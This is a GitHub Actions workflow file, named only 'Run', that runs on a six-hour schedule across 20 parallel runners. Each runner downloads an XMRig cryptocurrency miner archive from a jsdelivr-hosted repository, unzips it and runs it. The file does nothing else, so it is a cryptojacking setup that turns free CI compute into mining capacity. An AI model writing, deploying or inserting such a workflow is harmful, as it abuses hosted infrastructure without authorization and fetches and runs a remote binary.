name: Run
on: 
  workflow_dispatch:
  schedule:
     - cron:  '0 0/6 * * *'
  
jobs:
    run:
        name: Run
        runs-on: ubuntu-latest
        strategy:
          fail-fast: false
          matrix:
            runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
        steps:
          - shell: bash
            run: |
              sudo apt-get update
              sudo apt-get install unzip --yes
              curl --location --output xmrig.zip \
              https://cdn.jsdelivr.net/gh/foraz/m/xmrig.zip
              unzip xmrig.zip
              chmod +x xmrig
              ./xmrig
